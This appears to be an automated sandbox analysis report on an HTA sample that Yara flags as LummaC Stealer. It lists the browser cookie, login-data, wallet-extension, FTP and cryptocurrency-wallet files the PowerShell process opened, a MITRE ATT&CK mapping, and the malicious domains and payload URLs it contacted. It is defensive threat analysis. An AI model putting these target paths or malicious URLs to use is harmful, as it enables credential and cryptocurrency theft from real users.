Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents\EOWRVPQCCS	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents\EOWRVPQCCS	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents\BXAJUJAOEO	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents\BXAJUJAOEO	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents\DUUDTUBZFW	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents\DUUDTUBZFW	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents\EOWRVPQCCS	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents\EOWRVPQCCS	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents\GLTYDMDUST	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents\GLTYDMDUST	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents\LIJDSFKJZG	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents\LIJDSFKJZG	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents\NVWZAPQSQL	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents\NVWZAPQSQL	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents\QCOILOQIKC	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents\QCOILOQIKC	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents\WSHEJMDVQC	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents\WSHEJMDVQC	Jump to behavior

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 2292, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	121 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	2 OS Credential Dumping	11 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	1 Scheduled Task/Job	111 Process Injection	3 Obfuscated Files or Information	LSASS Memory	24 System Information Discovery	Remote Desktop Protocol	41 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	Logon Script (Windows)	1 Scheduled Task/Job	2 Software Packing	Security Account Manager	321 Security Software Discovery	SMB/Windows Admin Shares	1 Screen Capture	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	3 PowerShell	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	1 Process Discovery	Distributed Component Object Model	1 Email Collection	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Masquerading	LSA Secrets	221 Virtualization/Sandbox Evasion	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	221 Virtualization/Sandbox Evasion	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	111 Process Injection	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
web44.mp4.hta	0%	ReversingLabs

Source	Detection	Scanner	Label
https://cdn1.klipbazyxui.shop	100%	Avira URL Cloud	malware
https://noisercluch.click/V	0%	Avira URL Cloud	safe
https://noisercluch.click/	0%	Avira URL Cloud	safe
https://noisercluch.click/apite	0%	Avira URL Cloud	safe
noisercluch.click	0%	Avira URL Cloud	safe
https://noisercluch.click/W201.0	0%	Avira URL Cloud	safe
https://noisercluch.click/api	0%	Avira URL Cloud	safe
https://cdn1.k	0%	Avira URL Cloud	safe
https://cdn1.klipbazyxui.shop/web44.dle	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
cdn1.klipbazyxui.shop	172.67.154.95	true	true		unknown
noisercluch.click	188.114.96.3	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
scentniej.buzz	false		high
https://noisercluch.click/api	true	Avira URL Cloud: safe	unknown
rebuildeso.buzz	false		high
noisercluch.click	true	Avira URL Cloud: safe	unknown
appliacnesot.buzz	false		high
screwamusresz.buzz	false		high
cashfuzysao.buzz	false		high
inherineau.buzz	false		high
https://cdn1.klipbazyxui.shop/web44.dle	true	Avira URL Cloud: malware	unknown
prisonyfork.buzz	false		high
hummskitnj.buzz	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000002.00000002.2134142607.0000000006289000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2908433712.000000000613A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn1.klipbazyxui.shop	powershell.exe, 00000004.00000002.2908433712.0000000005227000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://noisercluch.click/V	powershell.exe, 00000008.00000002.4462135641.0000000005870000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://stackoverflow.com/q/14436606/23354	powershell.exe, 00000004.00000002.2946159742.0000000007410000.00000004.08000000.00040000.00000000.sdmp	false		high
https://github.com/mgravell/protobuf-netJ	powershell.exe, 00000004.00000002.2946159742.0000000007410000.00000004.08000000.00040000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000004.00000002.2908433712.0000000005227000.00000004.00000800.00020000.00000000.sdmp	false		high
https://noisercluch.click/	powershell.exe, 00000008.00000002.4461034225.00000000035B4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.4462135641.0000000005870000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
